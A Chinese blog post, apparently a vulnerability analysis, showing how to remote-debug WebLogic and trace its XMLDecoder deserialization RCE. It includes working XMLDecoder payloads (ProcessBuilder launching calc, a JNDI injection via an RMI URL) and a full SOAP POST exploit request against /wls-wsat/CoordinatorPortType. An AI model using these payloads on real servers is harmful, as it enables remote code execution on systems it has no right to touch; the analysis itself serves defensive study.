2. 程式人生 > >weblogic遠端除錯XMLDecoder RCE

weblogic遠端除錯XMLDecoder RCE

阿新 發佈:2019-01-04

首先說一下遠端除錯的配置,首先在weblogic的啟動檔案加入如下配置,開啟伺服器遠端除錯埠就是9999:
Alt text
第二步,建立一個java的空專案。
第三步將weblogic的所有jar包拷出來,放到一個檔案中。
Alt text
第四步把jar包匯入idea的lib配置中
Alt text
第五步新增一個remote,埠修改為9999
Alt text
在加入的jar包打斷點後,點選debug小瓢蟲的圖示就能進一步除錯了
Alt text
下面開始說xmldecoder的反序列化:
xmldecode,xmlendoer是將xml檔案轉化成java bean,簡單的小例子如下:
XMLTest.java

package me.lightless.shiro;

import java.beans.XMLEncoder;
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.FileInputStream;
import java.io.FileOutputStream;
public class XMLTest {
        public void xmlEncode() throws Exception
         {
         MyInfo my = new MyInfo();
         my.setMyage(25);
         my.setMyName("google");
         my.setMyaddress("china");
         my.setMyEducation("master in science");

        XMLEncoder encoder = new XMLEncoder(
        new BufferedOutputStream(
        new FileOutputStream("myinfo.xml")));
         encoder.writeObject(my);
         encoder.close();
         System.out.println(my);
         }
         public void xmlDecode() throws Exception
         {
         java.beans.XMLDecoder decoder = new java.beans.XMLDecoder(
         new BufferedInputStream(new FileInputStream("myinfo.xml")));
         MyInfo my = (MyInfo)decoder.readObject();
         decoder.close();
         System.out.println(my);
         System.out.println("Your age: "+my.getMyage());
        }
         public static void main (String args[]) throws Exception {
         XMLTest st = new XMLTest();
         st.xmlEncode();
         st.xmlDecode();
         }
        }

MyInfo.java

package me.lightless.shiro;

public class MyInfo {
    private int myage;

    public int getMyage() {
        return myage;
    }

    public void setMyage(int myage) {
        this.myage = myage;
    }

    public String getMyName() {
        return myName;
    }

    public void setMyName(String myName) {
        this.myName = myName;
    }

    public String getMyaddress() {
        return myaddress;
    }

    public void setMyaddress(String myaddress) {
        this.myaddress = myaddress;
    }

    public String getMyEducation() {
        return myEducation;
    }

    public void setMyEducation(String myEducation) {
        this.myEducation = myEducation;
    }

    private String myName;
    private String myaddress;
    private String myEducation;
}

執行結果:
Alt text
如果xml傳入的是惡意程式碼,就能導致命令執行:
XmlDecoderTest.java

package me.lightless.shiro;

import java.beans.XMLDecoder;
import java.io.BufferedInputStream;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.IOException;
import java.util.ArrayList;
import java.util.List;

public class XmlDecoderTest {

    public static void main(String[] args) {
        // TODO Auto-generated method stub
        java.io.File file = new java.io.File("E:\\Struts2-Vulenv-master\\Java-Unserialization-Study\\src\\main\\java\\me\\lightless\\shiro\\xmldecoder.xml");
        java.beans.XMLDecoder xd = null;
        try {
            xd = new XMLDecoder(new BufferedInputStream(new FileInputStream(file)));
        } catch (FileNotFoundException e) {
            // TODO Auto-generated catch block
            e.printStackTrace();
        }

        Object s2 = xd.readObject();
        xd.close();
    }

}

如下三種payload能夠彈計算器:

<?xml version="1.0" encoding="UTF-8"?>
<java version="1.8.0_131" class="java.beans.XMLDecoder">
    <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="1">
            <void index="0">
                <string>calc</string>
            </void>
        </array>
        <void method="start" />
    </object>
</java>
<java version="1.4.0" class="java.beans.XMLDecoder">
    <new class="java.lang.ProcessBuilder">
        <string>calc</string><method name="start" />
    </new>
</java>

這個payload參考這個連線jndi注入https://paper.tuisec.win/detail/a5927ff39106516

<java version="1.8.0_131" class="java.beans.XMLDecoder">
    <void class="com.sun.rowset.JdbcRowSetImpl">
        <void property="dataSourceName">
            <string>rmi://localhost:1099/Exploit</string>
        </void>
        <void property="autoCommit">
            <boolean>true</boolean>
        </void>
    </void>
</java>

Alt text
提交如下payload:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 603

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
    <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java><java version="1.8.0_131" class="java.beans.XMLDecoder">
    <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="1">
            <void index="0">
                <string>calc</string>
            </void>
        </array>
        <void method="start" />
    </object>
</java></java>
    </work:WorkContext>
    </soapenv:Header>
    <soapenv:Body/>
</soapenv:Envelope>

C:\Users\Administrator\Desktop\lib\weblogic.jar!\weblogic\wsee\jaxws\workcontext\WorkContextServerTube.class在40行下斷點,傳入的引數。
Alt text
跟進readHeaderOld,跟進WorkContextXmlInputAdapter
Alt text
跟進行XMLDecoder,var1則是我們傳入的payload
Alt text
呼叫的棧資訊如下:
Alt text
參考連結:
https://paper.seebug.org/487/
https://blog.csdn.net/defonds/article/details/83510668#_39
https://github.com/Tom4t0/Tom4t0.github.io/blob/master/_posts/2017-12-22-WebLogic%20WLS-WebServices%E7%BB%84%E4%BB%B6%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90.md

相關推薦

weblogic遠端除錯XMLDecoder RCE

首先說一下遠端除錯的配置,首先在weblogic的啟動檔案加入如下配置,開啟伺服器遠端除錯埠就是9999: 第二步,建立一個java的空專案。 第三步將weblogic的所有jar包拷出來,放到一個檔案中。 第四步把jar包匯入idea的lib配置中 第五步新增一個remote,埠修改為9999 在加

weblogic遠程調試XMLDecoder RCE

decode context tty 五步 edi org rtu rpo bug 首先說一下遠程調試的配置,首先在weblogic的啟動文件加入如下配置,開啟服務器遠程調試端口就是9999: 第二步,建立一個java的空項目。 第三步將weblogic的所有jar包拷出

weblogic遠端除錯配置

1.  伺服器端配置  在D:\bea\user_projects\domains\mydomain 下找到startWebLogic.cmd   開啟startWebLogic.cmd 檔案  增加一行:  set JAVA_DEBUG=-Xdebug -Xno

遠端除錯docker構建的weblogic

環境資訊 OSType: CentOS Linux 7 (Core) x86_64 3.10.0-957.21.3.el7.x86_64 DockerVersion: 19.03.8 Mirrors: http://ovfftd6p.mirror.aliyuncs.com/

IDA動態遠端除錯elf檔案的最簡單設定(姿勢)

0x01: 將IDA安裝目錄下的dbgsrv資料夾整個都拷貝到linux下(我都拷貝到了ubuntu桌面) 0x02: 將所要除錯的檔案直接放在dbgsrv目錄下 0x03: IDA設定如下: 0x04: 這裡根據你的elf檔案型別

chrome瀏覽器遠端除錯移動端Web頁面

  1.Android系統的移動裝置   a.開啟 USB除錯模式;具體設定請自行百度;   b.用USB資料線連線手機裝置,並同意這臺計算機進行USB除錯;   c.在瀏覽器位址列輸入chrome://inspect 或者about:inspec;可以顯示出裝置的名稱,在下圖中

spark JAVA 開發環境搭建及遠端除錯

spark JAVA 開發環境搭建及遠端除錯 以後要在專案中使用Spark 使用者暱稱文字做一下聚類分析,找出一些違規的暱稱資訊。以前折騰過Hadoop,於是看了下Spark官網的文件以及 github 上 官方提供的examples,看完了之後決定動手跑一個文字聚類的demo,於是有了下文。 1. 環境

遠端除錯工程筆記

遠端除錯工程筆記 一 tomcat目錄下 bin/catalina.sh 配置檔案增加一行 JAVA_OPTS="$JAVA_OPTS -Xdebug -Xrunjdwp:transport=dt_socket,address=8088,server=y,suspend=n"

idea(8) 遠端部署和遠端除錯

https://stackoverflow.com/questions/29842516/error-running-intellij-debugger-unable-to-open-debugger-port-java-net-connect http://blog.csdn.ne

【Java】使用IDEA遠端除錯Java程式碼 【Java】Maven Tomcat外掛使用

概述   服務端程式執行在一臺遠端伺服器上,我們可以在本地服務端的程式碼(前提是本地的程式碼必須和遠端伺服器執行的程式碼一致)中設定斷點,每當有請求到遠端伺服器時時能夠在本地知道遠端服務端的此時的內部狀態 測試專案   建立方式參考:【Java】Maven Tomcat外掛使用   專案中新增了一個測

使用weinre遠端除錯移動裝置上的網頁

weinre簡介 weinre 是一款類似於firebug 和Web Inspector的網頁除錯工具, 它的不同之處在於可以用於進行遠端除錯,比如除錯手機上面的網頁。 weinre的安裝 weinre是用node編寫的,可以用npm來進行安裝(前提是您的機器上

fiddler的autoResponder及設定手機端代理實現遠端除錯

這是開通部落格的第一篇隨筆,好雞凍哈哈o_O 首先是下載安裝,我安裝的是最新的v4.6.2.0版本,大家在百度上搜fidddler4在百度軟體中心普通下載就可以了。 或者直接用這個連線:http://dlsw.baidu.com/sw-search-sp/soft/47/10963/fidd

PHPStorm安裝Xdebug外掛(遠端除錯:本地 && 虛擬機器)

PHPStorm 斷點除錯 1、下載Xdebug 官網地址:https://xdebug.org 2、列印phpinfo()資訊 <?php echo phpinfo(); 3、下載合適的版本 檢視phpinfo的原始碼,Ctrl+a

idea下遠端除錯springboot專案

 最近因為專案原因,需要用到遠端除錯專案,下面是在idea上的除錯過程, 1.新增remote,Host是需要遠端除錯的ip地址,port是自己定義的一個埠號, JDK根據自己使用的jdk版本自行選擇, -agentlib:jdwp=transport=dt_socket

GDB遠端除錯程式 & 生成core檔案便於除錯

# GDB遠端除錯程式 **該檔案是用於遠端除錯gdb,資料夾中的gdbserver和arm-linux-gdb的版本已經保持一致均為6.4** 1. target:`./gdbserver6.4 192.168.100.101:8888 ./test_scale`  2. hos

使用VisualStudioCode遠端除錯NodeJS程式

Kagula 2018-08-02 環境: [1]NodeJS v8.9.1 [2]Visual Studio Code 1.25.1 [3]有兩臺計算機:    第一臺計算機上裝了linux系統, 執行nodeJS程式.    我們稱之為遠端計算機,

Tomcat: 開啟遠端除錯Remote Debugging模式

2018.11.01 文章目錄 前言 方法 方法一:`JPDA_OPTS` 方法二(建議):`CATALINA_OPTS` Old-fashioned方法 前言 Tomcat的遠端除錯

PHP Tools for Visual Studio 配置xdebug遠端除錯

我的開發環境是win10 執行環境在vagrant-homestead中 先在vagrant-homestead安裝xdebug並配置,可以參考之前的文章vagrant-homestead安裝xdebug  右鍵專案點選屬性,然後按圖配置 其中http://mytest.x

springboot專案使用idea開啟遠端除錯

遠端除錯是除錯伺服器的有效手段,遠端伺服器執行的應用可以在原生代碼中打斷點除錯,能讓開發人員準確定位伺服器上的問題。 一、開啟遠端除錯前提:原生代碼與伺服器程式碼一致, 二、開啟遠端除錯步驟   1.開發工具配置   idea端開啟Edit configurations,      增加Remot

idea遠端除錯jar包

1 伺服器啟動jar包 (監聽埠5005)   java -Xdebug -Xrunjdwp:transport=dt_socket,address=5005,server=y,suspend=y -jar xxxxxx.jar 2配置idea   -agentlib:jdwp=tran